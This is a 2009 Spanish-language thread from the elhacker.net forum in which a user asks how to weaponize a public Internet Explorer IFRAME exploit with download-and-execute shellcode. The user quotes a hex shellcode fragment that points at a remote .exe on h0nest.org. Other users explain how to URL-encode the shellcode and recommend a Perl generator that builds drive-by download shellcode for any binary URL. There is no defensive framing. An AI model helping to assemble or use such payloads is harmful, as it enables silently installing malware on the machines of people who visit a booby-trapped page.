elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
25 Mayo 2012, 19:13  


Tema destacado: Últimos eventos sobre seguridad/inseguridad

+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits (Moderador: berz3k)
| | |-+  Modificar exploit IFRAME (IE) para Down&Exec.
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Modificar exploit IFRAME (IE) para Down&Exec.  (Leído 2,706 veces)
akrana

Desconectado Desconectado

Mensajes: 36


Ver Perfil
Modificar exploit IFRAME (IE) para Down&Exec.
« en: 29 Junio 2009, 13:58 »

Hola, bueno despues de haber leido un excelente paper sobre como cambiar la shell a este exploit por otra, concretamente por una shellcode del tipo reverse shell, surge la idea de cambiarla por otra diferente a las dos, una shellcode Download&Execute.
El exploit es este: http://www.securityfocus.com/bid/11515/exploit.
Aqui dejo tambien el link al mismo exploit modificado para ReverseShell por compañeros del foro: http://foro.elhacker.net/bugs_y_exploits/exploit_iframe_modificado_para_reverse_shell_por_loredo_gospel-t49300.0.html.
Y aqui la shellcode que quiero introducir en el exploit: http://www.milw0rm.com/exploits/1386.
Hasta aqui todo claro, pero ahora como codifico esta shell para que funcione correctamente el exploit?

Si alguien se anima a echarme una mano se lo agradeceria,
Un saludo.
« Última modificación: 30 Junio 2009, 06:02 por akrana » En línea
Nakp
casi es
Ex-Staff
*
Desconectado Desconectado

Mensajes: 6.334

he vuelto :)


Ver Perfil WWW
Re: Modificar exploit IFRAME (IE) para Down&Exec.
« Respuesta #1 en: 1 Julio 2009, 01:01 »

pues, tienes la shell en hex y en el javascript tiene todo en unicode urlencodeado... pero puedes usar hex por ulrencode también

ya sabrás por donde seguir...
En línea

Ojo por ojo, y el mundo acabará ciego.
akrana

Desconectado Desconectado

Mensajes: 36


Ver Perfil
Re: Modificar exploit IFRAME (IE) para Down&Exec.
« Respuesta #2 en: 1 Julio 2009, 06:39 »

Bueno ante todo gracias por responder, la shell que tengo esta en hex y segun entendi despues de leer el paper tengo que codificarla a UTF-16 Littel Endian, alguien sabe como hacerlo?
En la shell de milworm aparece en la ultima linea la url donde esta alojado el archivo, esta la tengo que pasar a hexadecimal y luego codificarla con el resto de la shell?

Citar
"\xEC\x04\x83\x2C\x24\x62\xFF\xD0\xBF\x7E\xD8\xE2\x73\xE8\x40\xFF"
"\xFF\xFF\x52\xFF\xD0\xE8\xD7\xFF\xFF\xFF"
"http://h0nest.org/1.exe";

Un saludo y disculpen mi ignorancia...
En línea
kiaro

Desconectado Desconectado

Mensajes: 16



Ver Perfil
Re: Modificar exploit IFRAME (IE) para Down&Exec.
« Respuesta #3 en: 21 Julio 2009, 01:57 »


Lo mejor que puedes hacer en esta situtacion chico, es que te descarges schellcode generator broswers edition, que esta escrito en perl, si estas en un ambiente que windows, bajate el active perl.

active perl download
http://www.activestate.com/activeperl/downloads/

lo instalas, y luego en le cmd haces lo siguente, perl shellcode.pl http://Http://www.dominio/tunombredelbinario.exe  + enter.

luego, te manda la shellcode ya harcodeada copias y listo para reemplazar tu hermosa shellcode download and execute.

ami siempre me ha funcionando.

shellcode generator (Broswers edition)
http://www.milw0rm.com/shellcode/5251

es lo mejor que puedes hacer en tu situacion.

saludos :xD :xD :xD :xD




En línea
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines